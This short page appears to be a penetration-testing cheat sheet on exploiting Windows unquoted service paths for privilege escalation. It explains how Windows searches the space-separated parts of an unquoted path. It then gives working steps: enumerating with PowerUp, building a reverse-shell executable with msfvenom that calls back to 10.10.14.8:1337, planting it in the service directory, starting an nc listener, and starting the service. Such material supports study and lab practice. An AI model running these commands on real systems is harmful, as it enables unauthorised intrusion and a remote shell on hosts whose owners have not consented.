Unquoted Service Paths

Overview

Unquotes service paths is similar to binary path exploitation, however the vulnerability lays in the fact that the path to the executable is unquoted.

When the service is started Windows looks through every word in the path separated with a space and test .exe

C:\Program.exe - NO
C:\Program Files.exe - NO
C:\Program Files\Unquoted.exe - NO
C:\Program Files\Unquoted Path.exe - NO

And so on...

Exploitation via PowerUp

Run PowerUp and search for Unquoted Service Paths section

Create and drop a malicious executable

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.8 LPORT=1337 -f exe -o Common.exe

cp C:\temp\Common.exe C:\Program Files\Unquoted Path Service\Common.exe

Start a listener and the service

nc -lnvp 1337

sc start unquotedsvc

PreviousBinary Paths Nextgetsystem

Last updated 11 months ago

Was this helpful?